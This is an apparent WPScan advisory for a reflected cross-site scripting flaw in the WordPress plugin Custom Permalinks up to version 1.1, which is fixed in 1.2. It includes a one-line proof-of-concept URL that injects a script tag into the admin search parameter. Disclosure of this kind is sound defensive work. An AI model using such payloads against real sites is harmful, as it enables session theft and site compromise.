Custom Permalinks <= 1.1 - Cross-Site Scripting (XSS)



Description
User controllable input in the admin page of Custom Permalinks gets output without any escaping. 
Proof of Concept
URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks&s=<script>alert(1)</script>

Affects Plugin

fixed in version 1.2

References

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Karim El Ouerghemmi
Submitter Website https://ripstech.com
Views 1218
Verified No
WPVDB ID 9030

Timeline

Publicly Published 2018-02-22 (10 months ago)
Added 2018-02-25 (10 months ago)
Last Updated 2018-02-25 (10 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.